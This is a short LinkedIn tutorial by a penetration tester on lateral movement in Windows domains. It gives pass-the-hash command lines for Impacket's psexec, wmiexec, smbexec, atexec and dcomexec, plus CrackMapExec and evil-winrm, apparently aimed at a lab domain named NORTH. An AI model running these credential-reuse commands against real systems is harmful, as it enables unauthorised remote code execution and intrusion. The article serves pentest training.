登录查看更多内容

Lateral Move with impacket

Abdalla Abdelrhman

Sr Penetration Tester | OSWE | eWPTx | eMAPT | CTF

发布日期: 2024年4月30日

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object-oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

Let's clarify the most important ones.

Impacket - PsExec

PsExec:

Upload executable file

Create a service running the executable file
Communicate via namedPipe
Protocol: SMB

psexec -hashes  ':cba36eccfd9d949c73bc73715364aff5'  NORTH/[email protected]

Impacket - WmiExec

WmiExec (pseudo terminal):

Create a new process via wmi
Create a file to get the command results, read the file with smb, and delete it
Protocol: DCERPC + SMB

wmiexec.py -hashes  ':cba36eccfd9d949c73bc73715364aff5'  NORTH/[email protected]

Impacket - SmbExec

SmbExec (pseudo terminal):

No need to upload files
Create service on every request
Get command results on a shared or attacker-controlled server (use -mode SERVER)
Protocol: SMB

smbexec.py -hashes  ':cba36eccfd9d949c73bc73715364aff5'  NORTH/[email protected]

Impacket - AtExec

AtExec (execute command):

Auben Networks 10 个月前

Cheesey: Cheeseyjack Vulnhub walkthrough

KEVIN VANEGAS 1 年前

Reverse Shell Theory for beginners

oussama ben hadj dahman 2 年前

Create a scheduled task to execute commands
Protocol: SMB

atexec.py -hashes  ':cba36eccfd9d949c73bc73715364aff5'  NORTH/[email protected] whoami

Impacket - DcomExec

DecomExec (Distributed Component Object Model):

Pseudo-terminal (get results using files via smb)
Protocol: DCERPC + SMB

dcomexec.py -hashes  ':cba36eccfd9d949c73bc73715364aff5'  NORTH/[email protected]

Lateral Move with CME

cme smb  192 .168.xx.xx -H  ':cba36eccfd9d949c73bc73715364aff5'  -d  'north'  -u  'catelyn.stark'  -x whoami

By default, cme only checks if smb admin$ is writable. If this is the case, display "pwned".
For executing cme, use the -x option and by default use the wmiexec impacket method

Winrm

Winrm (Windows Remote Management)
Protocol: HTTP or HTTPS

evil-winrm -i  192 .168.xx.xx -u catelyn.stark -H  'cba36eccfd9d949c73bc73715364aff5'

I hope you enjoyed reading and I will be pleased if you have any feedback

Lateral Move with impacket

Abdalla Abdelrhman

Sr Penetration Tester | OSWE | eWPTx | eMAPT | CTF

Impacket - PsExec

Impacket - WmiExec

Impacket - SmbExec

Impacket - AtExec

领英推荐

Impacket - DcomExec

Lateral Move with CME

Winrm

更多精彩文章

社区洞察

其他会员也浏览了

Test Automation - How To Attach Public IP Adress to Allure report using Pytest and Requests

Application Performance, Errors, Logs & Traces, All in One Platform!

how to set up the raspberry pi camera module

S3 Security - Uploading Objects Using Pre-Signed URLs

Python Network Scripts:

How to Set Up a Python Web Development Environment

#54: How to integrate alert system into a machine vision app ?

HackTheBox: Forge - Detailed Walkthrough

What's next in SRON?

Impacket - PsExec

Impacket - WmiExec

Impacket - SmbExec

Impacket - AtExec

领英推荐

Impacket - DcomExec

Lateral Move with CME

Winrm

Cobalt Strike

2024年5月28日

社区洞察

其他会员也浏览了

Test Automation - How To Attach Public IP Adress to Allure report using Pytest and Requests

Application Performance, Errors, Logs & Traces, All in One Platform!

how to set up the raspberry pi camera module

S3 Security - Uploading Objects Using Pre-Signed URLs

Python Network Scripts:

How to Set Up a Python Web Development Environment

#54: How to integrate alert system into a machine vision app ?

HackTheBox: Forge - Detailed Walkthrough

What's next in SRON?